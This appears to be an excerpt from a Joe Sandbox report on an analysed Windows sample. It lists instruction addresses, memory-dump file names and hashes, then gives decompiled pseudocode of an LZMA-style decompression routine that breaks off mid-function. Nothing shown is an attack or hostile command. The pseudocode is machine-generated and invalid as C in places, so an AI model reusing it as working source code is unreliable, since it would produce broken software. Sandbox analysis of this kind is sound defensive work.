                                                                                                                                                                                                                            0x00406e29
                                                                                                                                                                                                                            0x00406e2f
                                                                                                                                                                                                                            0x00000000
                                                                                                                                                                                                                            0x00000000
                                                                                                                                                                                                                            0x00406e35
                                                                                                                                                                                                                            0x00406e35
                                                                                                                                                                                                                            0x00406e39
                                                                                                                                                                                                                            0x00406e3c
                                                                                                                                                                                                                            0x00406e3f
                                                                                                                                                                                                                            0x00406e42
                                                                                                                                                                                                                            0x00406e45
                                                                                                                                                                                                                            0x00406e46
                                                                                                                                                                                                                            0x00406e49
                                                                                                                                                                                                                            0x00406e4b
                                                                                                                                                                                                                            0x00406e51
                                                                                                                                                                                                                            0x00406e54
                                                                                                                                                                                                                            0x00406e57
                                                                                                                                                                                                                            0x00406e5a
                                                                                                                                                                                                                            0x00406e5d
                                                                                                                                                                                                                            0x00406e60
                                                                                                                                                                                                                            0x00406e63
                                                                                                                                                                                                                            0x00406e7f
                                                                                                                                                                                                                            0x00406e82
                                                                                                                                                                                                                            0x00406e85
                                                                                                                                                                                                                            0x00406e88
                                                                                                                                                                                                                            0x00406e8f
                                                                                                                                                                                                                            0x00406e93
                                                                                                                                                                                                                            0x00406e95
                                                                                                                                                                                                                            0x00406e99
                                                                                                                                                                                                                            0x00406e65
                                                                                                                                                                                                                            0x00406e65
                                                                                                                                                                                                                            0x00406e69
                                                                                                                                                                                                                            0x00406e71
                                                                                                                                                                                                                            0x00406e76
                                                                                                                                                                                                                            0x00406e78
                                                                                                                                                                                                                            0x00406e7a
                                                                                                                                                                                                                            0x00406e7a
                                                                                                                                                                                                                            0x00406e9c
                                                                                                                                                                                                                            0x00406ea3
                                                                                                                                                                                                                            0x00406ea6
                                                                                                                                                                                                                            0x00000000
                                                                                                                                                                                                                            0x00406eac
                                                                                                                                                                                                                            0x00000000
                                                                                                                                                                                                                            0x00406eac
                                                                                                                                                                                                                            0x00000000
                                                                                                                                                                                                                            0x00406eb1
                                                                                                                                                                                                                            0x00406eb1
                                                                                                                                                                                                                            0x00406eb5
                                                                                                                                                                                                                            0x00407575
                                                                                                                                                                                                                            0x00000000
                                                                                                                                                                                                                            0x00407575
                                                                                                                                                                                                                            0x00406ebb
                                                                                                                                                                                                                            0x00406ebe
                                                                                                                                                                                                                            0x00406ec1
                                                                                                                                                                                                                            0x00406ec5
                                                                                                                                                                                                                            0x00406ec8
                                                                                                                                                                                                                            0x00406ece
                                                                                                                                                                                                                            0x00406ed0
                                                                                                                                                                                                                            0x00406ed0
                                                                                                                                                                                                                            0x00406ed0
                                                                                                                                                                                                                            0x00406ed3
                                                                                                                                                                                                                            0x00406ed6
                                                                                                                                                                                                                            0x00406ed6
                                                                                                                                                                                                                            0x00406ed6
                                                                                                                                                                                                                            0x00406edc
                                                                                                                                                                                                                            0x00000000
                                                                                                                                                                                                                            0x00000000
                                                                                                                                                                                                                            0x00406ede
                                                                                                                                                                                                                            0x00406ee1
                                                                                                                                                                                                                            0x00406ee4
                                                                                                                                                                                                                            0x00406ee7
                                                                                                                                                                                                                            0x0040719e
                                                                                                                                                                                                                            0x0040719f
                                                                                                                                                                                                                            0x004071a2
                                                                                                                                                                                                                            0x004071a9
                                                                                                                                                                                                                            0x004071ac
                                                                                                                                                                                                                            0x004071ba
                                                                                                                                                                                                                            0x00000000
                                                                                                                                                                                                                            0x00000000
                                                                                                                                                                                                                            0x00000000
                                                                                                                                                                                                                            0x00000000
                                                                                                                                                                                                                            0x0040749f
                                                                                                                                                                                                                            0x0040749f
                                                                                                                                                                                                                            0x004074a3
                                                                                                                                                                                                                            0x004075db
                                                                                                                                                                                                                            0x00000000
                                                                                                                                                                                                                            0x004075db
                                                                                                                                                                                                                            0x004074a9
                                                                                                                                                                                                                            0x004074ac
                                                                                                                                                                                                                            0x004074af
                                                                                                                                                                                                                            0x004074b3
                                                                                                                                                                                                                            0x004074b6
                                                                                                                                                                                                                            0x004074bc
                                                                                                                                                                                                                            0x004074be
                                                                                                                                                                                                                            0x004074be
                                                                                                                                                                                                                            0x004074be
                                                                                                                                                                                                                            0x004074c1
                                                                                                                                                                                                                            0x004074c4
                                                                                                                                                                                                                            0x004074c4
                                                                                                                                                                                                                            0x004074c4
                                                                                                                                                                                                                            0x004074c4
                                                                                                                                                                                                                            0x00000000
                                                                                                                                                                                                                            0x00000000
                                                                                                                                                                                                                            0x004071c2
                                                                                                                                                                                                                            0x004071c5
                                                                                                                                                                                                                            0x004071fb
                                                                                                                                                                                                                            0x0040732b
                                                                                                                                                                                                                            0x0040732b
                                                                                                                                                                                                                            0x0040732b
                                                                                                                                                                                                                            0x0040732b
                                                                                                                                                                                                                            0x0040732e
                                                                                                                                                                                                                            0x0040732e
                                                                                                                                                                                                                            0x00407331
                                                                                                                                                                                                                            0x00407333
                                                                                                                                                                                                                            0x004075bd
                                                                                                                                                                                                                            0x00000000
                                                                                                                                                                                                                            0x004075bd
                                                                                                                                                                                                                            0x00407339
                                                                                                                                                                                                                            0x0040733c
                                                                                                                                                                                                                            0x00000000
                                                                                                                                                                                                                            0x00000000
                                                                                                                                                                                                                            0x00407342
                                                                                                                                                                                                                            0x00407346
                                                                                                                                                                                                                            0x00407349
                                                                                                                                                                                                                            0x00407349
                                                                                                                                                                                                                            0x00407349
                                                                                                                                                                                                                            0x00000000
                                                                                                                                                                                                                            0x00407349
                                                                                                                                                                                                                            0x004071c7
                                                                                                                                                                                                                            0x004071c9
                                                                                                                                                                                                                            0x004071cb
                                                                                                                                                                                                                            0x004071cd
                                                                                                                                                                                                                            0x004071d0
                                                                                                                                                                                                                            0x004071d1
                                                                                                                                                                                                                            0x004071d3
                                                                                                                                                                                                                            0x004071d5
                                                                                                                                                                                                                            0x004071d8
                                                                                                                                                                                                                            0x004071db
                                                                                                                                                                                                                            0x004071f1
                                                                                                                                                                                                                            0x004071f6
                                                                                                                                                                                                                            0x0040722e
                                                                                                                                                                                                                            0x0040722e
                                                                                                                                                                                                                            0x00407232
                                                                                                                                                                                                                            0x0040725e
                                                                                                                                                                                                                            0x00407260
                                                                                                                                                                                                                            0x00407267
                                                                                                                                                                                                                            0x0040726a
                                                                                                                                                                                                                            0x0040726d
                                                                                                                                                                                                                            0x0040726d
                                                                                                                                                                                                                            0x00407272
                                                                                                                                                                                                                            0x00407272
                                                                                                                                                                                                                            0x00407274
                                                                                                                                                                                                                            0x00407277
                                                                                                                                                                                                                            0x0040727e
                                                                                                                                                                                                                            0x00407281
                                                                                                                                                                                                                            0x004072ae
                                                                                                                                                                                                                            0x004072ae
                                                                                                                                                                                                                            0x004072b1
                                                                                                                                                                                                                            0x004072b4
                                                                                                                                                                                                                            0x00407328
                                                                                                                                                                                                                            0x00407328
                                                                                                                                                                                                                            0x00407328
                                                                                                                                                                                                                            0x00000000
                                                                                                                                                                                                                            0x00407328
                                                                                                                                                                                                                            0x004072b6
                                                                                                                                                                                                                            0x004072bc
                                                                                                                                                                                                                            0x004072bf
                                                                                                                                                                                                                            0x004072c2
                                                                                                                                                                                                                            0x004072c5
                                                                                                                                                                                                                            0x004072c8
                                                                                                                                                                                                                            0x004072cb
                                                                                                                                                                                                                            0x004072ce
                                                                                                                                                                                                                            0x004072d1
                                                                                                                                                                                                                            0x004072d4
                                                                                                                                                                                                                            0x004072d7
                                                                                                                                                                                                                            0x004072f0
                                                                                                                                                                                                                            0x004072f2
                                                                                                                                                                                                                            0x004072f5
                                                                                                                                                                                                                            0x004072f6
                                                                                                                                                                                                                            0x004072f9
                                                                                                                                                                                                                            0x004072fb
                                                                                                                                                                                                                            0x004072fe
                                                                                                                                                                                                                            0x00407300
                                                                                                                                                                                                                            0x00407302
                                                                                                                                                                                                                            0x00407305
                                                                                                                                                                                                                            0x00407307
                                                                                                                                                                                                                            0x0040730a
                                                                                                                                                                                                                            0x0040730e
                                                                                                                                                                                                                            0x00407310
                                                                                                                                                                                                                            0x00407310
                                                                                                                                                                                                                            0x00407311
                                                                                                                                                                                                                            0x00407314
                                                                                                                                                                                                                            0x004074cd
                                                                                                                                                                                                                            0x004074d3
                                                                                                                                                                                                                            0x004074d6
                                                                                                                                                                                                                            0x004074d9
                                                                                                                                                                                                                            0x004074dc
                                                                                                                                                                                                                            0x004074df
                                                                                                                                                                                                                            0x004074e2
                                                                                                                                                                                                                            0x004074e5
                                                                                                                                                                                                                            0x004074e8
                                                                                                                                                                                                                            0x004074ee
                                                                                                                                                                                                                            0x00407507
                                                                                                                                                                                                                            0x0040750a
                                                                                                                                                                                                                            0x0040750d
                                                                                                                                                                                                                            0x00407510
                                                                                                                                                                                                                            0x00407514
                                                                                                                                                                                                                            0x00407516
                                                                                                                                                                                                                            0x00407517
                                                                                                                                                                                                                            0x0040751a
                                                                                                                                                                                                                            0x004074f0
                                                                                                                                                                                                                            0x004074f0
                                                                                                                                                                                                                            0x004074f8
                                                                                                                                                                                                                            0x004074fd
                                                                                                                                                                                                                            0x004074ff
                                                                                                                                                                                                                            0x00407502
                                                                                                                                                                                                                            0x00407502
                                                                                                                                                                                                                            0x00407524
                                                                                                                                                                                                                            0x00000000
                                                                                                                                                                                                                            0x00407526
                                                                                                                                                                                                                            0x00000000
                                                                                                                                                                                                                            0x00407526
                                                                                                                                                                                                                            0x00407524
                                                                                                                                                                                                                            0x00000000
                                                                                                                                                                                                                            0x00407399

Memory Dump Source
• Source File: 00000007.00000002.531367159.0000000000401000.00000020.00000001.01000000.00000005.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000007.00000002.531329224.0000000000400000.00000002.00000001.01000000.00000005.sdmp
• Associated: 00000007.00000002.531503317.0000000000408000.00000002.00000001.01000000.00000005.sdmp
• Associated: 00000007.00000002.531563073.000000000040A000.00000004.00000001.01000000.00000005.sdmp
• Associated: 00000007.00000002.531808710.0000000000422000.00000004.00000001.01000000.00000005.sdmp
• Associated: 00000007.00000002.531838733.0000000000427000.00000004.00000001.01000000.00000005.sdmp
• Associated: 00000007.00000002.531879279.0000000000435000.00000004.00000001.01000000.00000005.sdmp
• Associated: 00000007.00000002.531979945.000000000046B000.00000002.00000001.01000000.00000005.sdmp
                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                            • Snapshot File: hcaresult_7_2_400000_UNK_.jbxd
                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                            • API ID:
                                                                                                                                                                                                                            • String ID:
                                                                                                                                                                                                                            • API String ID:
                                                                                                                                                                                                                            • Opcode ID: 97748a737734167d5846b9d8dd4738ada3f75d0b833fdafa89234df63502b4a5
                                                                                                                                                                                                                            • Instruction ID: d49815ad38d406b3cd0a1a90ea7be1526168d9e39684835ffa6a026ef1ef4849
                                                                                                                                                                                                                            • Opcode Fuzzy Hash: 97748a737734167d5846b9d8dd4738ada3f75d0b833fdafa89234df63502b4a5
                                                                                                                                                                                                                            • Instruction Fuzzy Hash: 91913270D04228DBEF28CF98C8547ADBBB1FF44305F14816AD856BB281D778A986DF45
                                                                                                                                                                                                                            Uniqueness

                                                                                                                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                                                                                                                            C-Code - Quality: 98%
                                                                                                                                                                                                                            			E004070AB() {
                                                                                                                                                                                                                            				unsigned short _t532;
                                                                                                                                                                                                                            				signed int _t533;
                                                                                                                                                                                                                            				void _t534;
                                                                                                                                                                                                                            				void* _t535;
                                                                                                                                                                                                                            				signed int _t536;
                                                                                                                                                                                                                            				signed int _t565;
                                                                                                                                                                                                                            				signed int _t568;
                                                                                                                                                                                                                            				signed int _t589;
                                                                                                                                                                                                                            				signed int* _t606;
                                                                                                                                                                                                                            				void* _t613;
                                                                                                                                                                                                                            
                                                                                                                                                                                                                            				L0:
                                                                                                                                                                                                                            				while(1) {
                                                                                                                                                                                                                            					L0:
                                                                                                                                                                                                                            					if( *(_t613 - 0x40) != 0) {
                                                                                                                                                                                                                            						L89:
                                                                                                                                                                                                                            						 *((intOrPtr*)(_t613 - 0x80)) = 0x15;
                                                                                                                                                                                                                            						 *(_t613 - 0x58) =  *(_t613 - 4) + 0xa68;
                                                                                                                                                                                                                            						L69:
                                                                                                                                                                                                                            						_t606 =  *(_t613 - 0x58);
                                                                                                                                                                                                                            						 *(_t613 - 0x84) = 0x12;
                                                                                                                                                                                                                            						L132:
                                                                                                                                                                                                                            						 *(_t613 - 0x54) = _t606;
                                                                                                                                                                                                                            						L133:
                                                                                                                                                                                                                            						_t532 =  *_t606;
                                                                                                                                                                                                                            						_t589 = _t532 & 0x0000ffff;
                                                                                                                                                                                                                            						_t565 = ( *(_t613 - 0x10) >> 0xb) * _t589;
                                                                                                                                                                                                                            						if( *(_t613 - 0xc) >= _t565) {
                                                                                                                                                                                                                            							 *(_t613 - 0x10) =  *(_t613 - 0x10) - _t565;
                                                                                                                                                                                                                            							 *(_t613 - 0xc) =  *(_t613 - 0xc) - _t565;
                                                                                                                                                                                                                            							 *(_t613 - 0x40) = 1;
                                                                                                                                                                                                                            							_t533 = _t532 - (_t532 >> 5);
                                                                                                                                                                                                                            							 *_t606 = _t533;
                                                                                                                                                                                                                            						} else {
                                                                                                                                                                                                                            							 *(_t613 - 0x10) = _t565;
                                                                                                                                                                                                                            							 *(_t613 - 0x40) =  *(_t613 - 0x40) & 0x00000000;
                                                                                                                                                                                                                            							 *_t606 = (0x800 - _t589 >> 5) + _t532;
                                                                                                                                                                                                                            						}
                                                                                                                                                                                                                            						if( *(_t613 - 0x10) >= 0x1000000) {
                                                                                                                                                                                                                            							L139:
                                                                                                                                                                                                                            							_t534 =  *(_t613 - 0x84);
                                                                                                                                                                                                                            							L140:
                                                                                                                                                                                                                            							 *(_t613 - 0x88) = _t534;
                                                                                                                                                                                                                            							goto L1;
                                                                                                                                                                                                                            						} else {
                                                                                                                                                                                                                            							L137:
                                                                                                                                                                                                                            							if( *(_t613 - 0x6c) == 0) {
                                                                                                                                                                                                                            								 *(_t613 - 0x88) = 5;
                                                                                                                                                                                                                            								goto L170;
                                                                                                                                                                                                                            							}
                                                                                                                                                                                                                            							 *(_t613 - 0x10) =  *(_t613 - 0x10) << 8;
                                                                                                                                                                                                                            							 *(_t613 - 0x6c) =  *(_t613 - 0x6c) - 1;
                                                                                                                                                                                                                            							 *(_t613 - 0x70) =  &(( *(_t613 - 0x70))[1]);
                                                                                                                                                                                                                            							 *(_t613 - 0xc) =  *(_t613 - 0xc) << 0x00000008 |  *( *(_t613 - 0x70)) & 0x000000ff;
                                                                                                                                                                                                                            							goto L139;
                                                                                                                                                                                                                            						}
                                                                                                                                                                                                                            					} else {
                                                                                                                                                                                                                            						if( *(__ebp - 0x60) == 0) {
                                                                                                                                                                                                                            							L171:
                                                                                                                                                                                                                            							_t536 = _t535 | 0xffffffff;
                                                                                                                                                                                                                            							L172:
                                                                                                                                                                                                                            							return _t536;
                                                                                                                                                                                                                            						}
                                                                                                                                                                                                                            						__eax = 0;
                                                                                                                                                                                                                            						_t258 =  *(__ebp - 0x38) - 7 >= 0;
                                                                                                                                                                                                                            						0 | _t258 = _t258 + _t258 + 9;
                                                                                                                                                                                                                            						 *(__ebp - 0x38) = _t258 + _t258 + 9;
                                                                                                                                                                                                                            						L75:
                                                                                                                                                                                                                            						if( *(__ebp - 0x64) == 0) {
                                                                                                                                                                                                                            							 *(__ebp - 0x88) = 0x1b;
                                                                                                                                                                                                                            							L170:
                                                                                                                                                                                                                            							_t568 = 0x22;
                                                                                                                                                                                                                            							memcpy( *(_t613 - 0x90), _t613 - 0x88, _t568 << 2);
                                                                                                                                                                                                                            							_t536 = 0;
                                                                                                                                                                                                                            							goto L172;
                                                                                                                                                                                                                            						}
                                                                                                                                                                                                                            						__eax =  *(__ebp - 0x14);
                                                                                                                                                                                                                            						__eax =  *(__ebp - 0x14) -  *(__ebp - 0x2c);
                                                                                                                                                                                                                            						if(__eax >=  *(__ebp - 0x74)) {
                                                                                                                                                                                                                            							__eax = __eax +  *(__ebp - 0x74);
                                                                                                                                                                                                                            						}
                                                                                                                                                                                                                            						__edx =  *(__ebp - 8);
                                                                                                                                                                                                                            						__cl =  *(__eax + __edx);
                                                                                                                                                                                                                            						__eax =  *(__ebp - 0x14);
                                                                                                                                                                                                                            						 *(__ebp - 0x5c) = __cl;
                                                                                                                                                                                                                            						 *(__eax + __edx) = __cl;
                                                                                                                                                                                                                            						__eax = __eax + 1;
                                                                                                                                                                                                                            						__edx = 0;
                                                                                                                                                                                                                            						_t274 = __eax %  *(__ebp - 0x74);
                                                                                                                                                                                                                            						__eax = __eax /  *(__ebp - 0x74);
                                                                                                                                                                                                                            						__edx = _t274;
                                                                                                                                                                                                                            						__eax =  *(__ebp - 0x68);
                                                                                                                                                                                                                            						 *(__ebp - 0x60) =  *(__ebp - 0x60) + 1;
                                                                                                                                                                                                                            						 *(__ebp - 0x68) =  *(__ebp - 0x68) + 1;
                                                                                                                                                                                                                            						_t283 = __ebp - 0x64;
                                                                                                                                                                                                                            						 *_t283 =  *(__ebp - 0x64) - 1;
                                                                                                                                                                                                                            						 *( *(__ebp - 0x68)) = __cl;
                                                                                                                                                                                                                            						L79:
                                                                                                                                                                                                                            						 *(__ebp - 0x14) = __edx;
                                                                                                                                                                                                                            						L80:
                                                                                                                                                                                                                            						 *(__ebp - 0x88) = 2;
                                                                                                                                                                                                                            					}
                                                                                                                                                                                                                            					L1:
                                                                                                                                                                                                                            					_t535 =  *(_t613 - 0x88);
                                                                                                                                                                                                                            					if(_t535 > 0x1c) {
                                                                                                                                                                                                                            						goto L171;
                                                                                                                                                                                                                            					}
                                                                                                                                                                                                                            					switch( *((intOrPtr*)(_t535 * 4 +  &M00407602))) {
                                                                                                                                                                                                                            						case 0:
                                                                                                                                                                                                                            							if( *(_t613 - 0x6c) == 0) {
                                                                                                                                                                                                                            								goto L170;
                                                                                                                                                                                                                            							}
                                                                                                                                                                                                                            							 *(_t613 - 0x6c) =  *(_t613 - 0x6c) - 1;
                                                                                                                                                                                                                            							 *(_t613 - 0x70) =  &(( *(_t613 - 0x70))[1]);
                                                                                                                                                                                                                            							_t535 =  *( *(_t613 - 0x70));
                                                                                                                                                                                                                            							if(_t535 > 0xe1) {
                                                                                                                                                                                                                            								goto L171;
                                                                                                                                                                                                                            							}
                                                                                                                                                                                                                            							_t539 = _t535 & 0x000000ff;
                                                                                                                                                                                                                            							_push(0x2d);
                                                                                                                                                                                                                            							asm("cdq");
                                                                                                                                                                                                                            							_pop(_t570);
                                                                                                                                                                                                                            							_push(9);
                                                                                                                                                                                                                            							_pop(_t571);
                                                                                                                                                                                                                            							_t609 = _t539 / _t570;
                                                                                                                                                                                                                            							_t541 = _t539 % _t570 & 0x000000ff;
                                                                                                                                                                                                                            							asm("cdq");
                                                                                                                                                                                                                            							_t604 = _t541 % _t571 & 0x000000ff;
                                                                                                                                                                                                                            							 *(_t613 - 0x3c) = _t604;
                                                                                                                                                                                                                            							 *(_t613 - 0x1c) = (1 << _t609) - 1;
                                                                                                                                                                                                                            							 *((intOrPtr*)(_t613 - 0x18)) = (1 << _t541 / _t571) - 1;
                                                                                                                                                                                                                            							_t612 = (0x300 << _t604 + _t609) + 0x736;
                                                                                                                                                                                                                            							if(0x600 ==  *((intOrPtr*)(_t613 - 0x78))) {
                                                                                                                                                                                                                            								L10:
                                                                                                                                                                                                                            								if(_t612 == 0) {
                                                                                                                                                                                                                            									L12:
                                                                                                                                                                                                                            									 *(_t613 - 0x48) =  *(_t613 - 0x48) & 0x00000000;
                                                                                                                                                                                                                            									 *(_t613 - 0x40) =  *(_t613 - 0x40) & 0x00000000;
                                                                                                                                                                                                                            									goto L15;
                                                                                                                                                                                                                            								} else {
                                                                                                                                                                                                                            									goto L11;
                                                                                                                                                                                                                            								}
                                                                                                                                                                                                                            								do {
                                                                                                                                                                                                                            									L11:
                                                                                                                                                                                                                            									_t612 = _t612 - 1;
                                                                                                                                                                                                                            									 *((short*)( *(_t613 - 4) + _t612 * 2)) = 0x400;
                                                                                                                                                                                                                            								} while (_t612 != 0);
                                                                                                                                                                                                                            								goto L12;
                                                                                                                                                                                                                            							}
                                                                                                                                                                                                                            							if( *(_t613 - 4) != 0) {
                                                                                                                                                                                                                            								GlobalFree( *(_t613 - 4));
                                                                                                                                                                                                                            							}
                                                                                                                                                                                                                            							_t535 = GlobalAlloc(0x40, 0x600); // executed
                                                                                                                                                                                                                            							 *(_t613 - 4) = _t535;
                                                                                                                                                                                                                            							if(_t535 == 0) {
                                                                                                                                                                                                                            								goto L171;
                                                                                                                                                                                                                            							} else {
                                                                                                                                                                                                                            								 *((intOrPtr*)(_t613 - 0x78)) = 0x600;
                                                                                                                                                                                                                            								goto L10;
                                                                                                                                                                                                                            							}
                                                                                                                                                                                                                            						case 1:
                                                                                                                                                                                                                            							L13:
                                                                                                                                                                                                                            							__eflags =  *(_t613 - 0x6c);
                                                                                                                                                                                                                            							if( *(_t613 - 0x6c) == 0) {
                                                                                                                                                                                                                            								 *(_t613 - 0x88) = 1;
                                                                                                                                                                                                                            								goto L170;
                                                                                                                                                                                                                            							}
                                                                                                                                                                                                                            							 *(_t613 - 0x6c) =  *(_t613 - 0x6c) - 1;
                                                                                                                                                                                                                            							 *(_t613 - 0x40) =  *(_t613 - 0x40) | ( *( *(_t613 - 0x70)) & 0x000000ff) <<  *(_t613 - 0x48) << 0x00000003;
                                                                                                                                                                                                                            							 *(_t613 - 0x70) =  &(( *(_t613 - 0x70))[1]);
                                                                                                                                                                                                                            							_t45 = _t613 - 0x48;
                                                                                                                                                                                                                            							 *_t45 =  *(_t613 - 0x48) + 1;
                                                                                                                                                                                                                            							__eflags =  *_t45;
                                                                                                                                                                                                                            							L15:
                                                                                                                                                                                                                            							if( *(_t613 - 0x48) < 4) {
                                                                                                                                                                                                                            								goto L13;
                                                                                                                                                                                                                            							}
                                                                                                                                                                                                                            							_t547 =  *(_t613 - 0x40);
                                                                                                                                                                                                                            							if(_t547 ==  *(_t613 - 0x74)) {
                                                                                                                                                                                                                            								L20:
                                                                                                                                                                                                                            								 *(_t613 - 0x48) = 5;
                                                                                                                                                                                                                            								 *( *(_t613 - 8) +  *(_t613 - 0x74) - 1) =  *( *(_t613 - 8) +  *(_t613 - 0x74) - 1) & 0x00000000;
                                                                                                                                                                                                                            								goto L23;
                                                                                                                                                                                                                            							}
							 *(_t613 - 0x74) = _t547;
							if( *(_t613 - 8) != 0) {
								GlobalFree( *(_t613 - 8));
							}
							_t535 = GlobalAlloc(0x40,  *(_t613 - 0x40)); // executed
							 *(_t613 - 8) = _t535;
							if(_t535 == 0) {
								goto L171;
							} else {
								goto L20;
							}
						case 2:
							L24:
							_t554 =  *(_t613 - 0x60) &  *(_t613 - 0x1c);
							 *(_t613 - 0x84) = 6;
							 *(_t613 - 0x4c) = _t554;
							_t606 =  *(_t613 - 4) + (( *(_t613 - 0x38) << 4) + _t554) * 2;
							goto L132;
						case 3:
							L21:
							__eflags =  *(_t613 - 0x6c);
							if( *(_t613 - 0x6c) == 0) {
								 *(_t613 - 0x88) = 3;
								goto L170;
							}
							 *(_t613 - 0x6c) =  *(_t613 - 0x6c) - 1;
							_t67 = _t613 - 0x70;
							 *_t67 =  &(( *(_t613 - 0x70))[1]);
							__eflags =  *_t67;
							 *(_t613 - 0xc) =  *(_t613 - 0xc) << 0x00000008 |  *( *(_t613 - 0x70)) & 0x000000ff;
							L23:
							 *(_t613 - 0x48) =  *(_t613 - 0x48) - 1;
							if( *(_t613 - 0x48) != 0) {
								goto L21;
							}
							goto L24;
						case 4:
							goto L133;
						case 5:
							goto L137;
						case 6:
							__edx = 0;
							__eflags =  *(__ebp - 0x40);
							if( *(__ebp - 0x40) != 0) {
								__eax =  *(__ebp - 4);
								__ecx =  *(__ebp - 0x38);
								 *(__ebp - 0x34) = 1;
								 *(__ebp - 0x84) = 7;
								__esi =  *(__ebp - 4) + 0x180 +  *(__ebp - 0x38) * 2;
								goto L132;
							}
							__eax =  *(__ebp - 0x5c) & 0x000000ff;
							__esi =  *(__ebp - 0x60);
							__cl = 8;
							__cl = 8 -  *(__ebp - 0x3c);
							__esi =  *(__ebp - 0x60) &  *(__ebp - 0x18);
							__eax = ( *(__ebp - 0x5c) & 0x000000ff) >> 8;
							__ecx =  *(__ebp - 0x3c);
							__esi = ( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8;
							__ecx =  *(__ebp - 4);
							(( *(__ebp - 0x5c) & 0x000000ff) >> 8) + (( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8) = (( *(__ebp - 0x5c) & 0x000000ff) >> 8) + (( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8) + ((( *(__ebp - 0x5c) & 0x000000ff) >> 8) + (( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8)) * 2;
							__eax = (( *(__ebp - 0x5c) & 0x000000ff) >> 8) + (( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8) + ((( *(__ebp - 0x5c) & 0x000000ff) >> 8) + (( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8)) * 2 << 9;
							__eflags =  *(__ebp - 0x38) - 4;
							__eax = ((( *(__ebp - 0x5c) & 0x000000ff) >> 8) + (( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8) + ((( *(__ebp - 0x5c) & 0x000000ff) >> 8) + (( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8)) * 2 << 9) +  *(__ebp - 4) + 0xe6c;
							 *(__ebp - 0x58) = ((( *(__ebp - 0x5c) & 0x000000ff) >> 8) + (( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8) + ((( *(__ebp - 0x5c) & 0x000000ff) >> 8) + (( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8)) * 2 << 9) +  *(__ebp - 4) + 0xe6c;
							if( *(__ebp - 0x38) >= 4) {
								__eflags =  *(__ebp - 0x38) - 0xa;
								if( *(__ebp - 0x38) >= 0xa) {
									_t98 = __ebp - 0x38;
									 *_t98 =  *(__ebp - 0x38) - 6;
									__eflags =  *_t98;
								} else {
									 *(__ebp - 0x38) =  *(__ebp - 0x38) - 3;
								}
							} else {
								 *(__ebp - 0x38) = 0;
							}
							__eflags =  *(__ebp - 0x34) - __edx;
							if( *(__ebp - 0x34) == __edx) {
								__ebx = 0;
								__ebx = 1;
								goto L61;
							} else {
								__eax =  *(__ebp - 0x14);
								__eax =  *(__ebp - 0x14) -  *(__ebp - 0x2c);
								__eflags = __eax -  *(__ebp - 0x74);
								if(__eax >=  *(__ebp - 0x74)) {
									__eax = __eax +  *(__ebp - 0x74);
									__eflags = __eax;
								}
								__ecx =  *(__ebp - 8);
								__ebx = 0;
								__ebx = 1;
								__al =  *((intOrPtr*)(__eax + __ecx));
								 *(__ebp - 0x5b) =  *((intOrPtr*)(__eax + __ecx));
								goto L41;
							}
						case 7:
							__eflags =  *(__ebp - 0x40) - 1;
							if( *(__ebp - 0x40) != 1) {
								__eax =  *(__ebp - 0x24);
								 *(__ebp - 0x80) = 0x16;
								 *(__ebp - 0x20) =  *(__ebp - 0x24);
								__eax =  *(__ebp - 0x28);
								 *(__ebp - 0x24) =  *(__ebp - 0x28);
								__eax =  *(__ebp - 0x2c);
								 *(__ebp - 0x28) =  *(__ebp - 0x2c);
								__eax = 0;
								__eflags =  *(__ebp - 0x38) - 7;
								0 | __eflags >= 0x00000000 = (__eflags >= 0) - 1;
								__al = __al & 0x000000fd;
								__eax = (__eflags >= 0) - 1 + 0xa;
								 *(__ebp - 0x38) = (__eflags >= 0) - 1 + 0xa;
								__eax =  *(__ebp - 4);
								__eax =  *(__ebp - 4) + 0x664;
								__eflags = __eax;
								 *(__ebp - 0x58) = __eax;
								goto L69;
							}
							__eax =  *(__ebp - 4);
							__ecx =  *(__ebp - 0x38);
							 *(__ebp - 0x84) = 8;
							__esi =  *(__ebp - 4) + 0x198 +  *(__ebp - 0x38) * 2;
							goto L132;
						case 8:
							__eflags =  *(__ebp - 0x40);
							if( *(__ebp - 0x40) != 0) {
								__eax =  *(__ebp - 4);
								__ecx =  *(__ebp - 0x38);
								 *(__ebp - 0x84) = 0xa;
								__esi =  *(__ebp - 4) + 0x1b0 +  *(__ebp - 0x38) * 2;
							} else {
								__eax =  *(__ebp - 0x38);
								__ecx =  *(__ebp - 4);
								__eax =  *(__ebp - 0x38) + 0xf;
								 *(__ebp - 0x84) = 9;
								 *(__ebp - 0x38) + 0xf << 4 = ( *(__ebp - 0x38) + 0xf << 4) +  *(__ebp - 0x4c);
								__esi =  *(__ebp - 4) + (( *(__ebp - 0x38) + 0xf << 4) +  *(__ebp - 0x4c)) * 2;
							}
							goto L132;
						case 9:
							goto L0;
                                                                                                                                                                                                                            						case 0xa:
                                                                                                                                                                                                                            							__eflags =  *(__ebp - 0x40);
                                                                                                                                                                                                                            							if( *(__ebp - 0x40) != 0) {
                                                                                                                                                                                                                            								__eax =  *(__ebp - 4);
                                                                                                                                                                                                                            								__ecx =  *(__ebp - 0x38);
                                                                                                                                                                                                                            								 *(__ebp - 0x84) = 0xb;
                                                                                                                                                                                                                            								__esi =  *(__ebp - 4) + 0x1c8 +  *(__ebp - 0x38) * 2;
                                                                                                                                                                                                                            								goto L132;
                                                                                                                                                                                                                            							}
                                                                                                                                                                                                                            							__eax =  *(__ebp - 0x28);
                                                                                                                                                                                                                            							goto L88;
                                                                                                                                                                                                                            						case 0xb:
                                                                                                                                                                                                                            							__eflags =  *(__ebp - 0x40);
                                                                                                                                                                                                                            							if( *(__ebp - 0x40) != 0) {
                                                                                                                                                                                                                            								__ecx =  *(__ebp - 0x24);
                                                                                                                                                                                                                            								__eax =  *(__ebp - 0x20);
                                                                                                                                                                                                                            								 *(__ebp - 0x20) =  *(__ebp - 0x24);
                                                                                                                                                                                                                            							} else {
                                                                                                                                                                                                                            								__eax =  *(__ebp - 0x24);
